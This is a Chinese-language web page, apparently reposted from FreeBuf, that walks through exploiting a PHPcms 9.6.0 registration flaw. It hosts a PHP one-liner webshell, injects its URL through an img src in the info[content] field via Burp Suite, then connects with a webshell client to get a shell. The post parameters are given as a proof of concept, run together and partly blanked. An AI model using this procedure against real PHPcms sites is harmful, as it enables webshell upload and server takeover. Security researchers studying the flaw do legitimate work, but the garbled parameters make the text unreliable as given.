当前位置:首页 > 网站编程 > 正文

phpcms公众号(php内容管理系统cms)

qiaoqingyi 发布:2023-11-17 13:10 7191


  *原创作者:三少,本文属FreeBuf原创奖励计划,未经许可禁止转载

  对于PHPcms9.6.0 最新版漏洞,具体利用步骤如下:

  首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行)

  

  在根目录下新建一个txt文本文件里面写上php一句话,如上图可以访问

  

  接着我们找到phpcms网站注册模块,随便填一下信息

  

  然后我们用burpsuite抓包

  

  然后发送到repeater

  

  我们在最下面的注册那儿使用img标签插入我们本地第一步搭建的一句话

  poc如下:

  siteid=1modelid=11username=zf1agac121password=aasgfaewee311as

  email=a1ea21f94@qq.cominfo[content]=img src=dosubmit=1protocol=

  只需要修改img里面的链接为你本地写入的一句话即可,还有要注意的是在repeater里测试go时每一次都要修改username,password和email字段值(不能重复,汗)

  我们可以看到repeater里MYSQL query成功插入,接着访问上图repeater里我标黄语句,执行一句话

  连接菜刀,getshell

  

  利用方式二:

  利用火狐的插件,操作如下

  

  exp如下:三少

  

phpcms公众号(php内容管理系统cms)

  

  

  *原创作者:三少,本文属FreeBuf原创奖励计划,未经许可禁止转载

版权说明:如非注明,本站文章均为 邯郸市兰霖科技有限公司 原创,转载请注明出处和附带本文链接;

本文地址:http://www.quwujie.com/post/109969.html


分享到

温馨提示

下载成功了么?或者链接失效了?

联系我们反馈

立即下载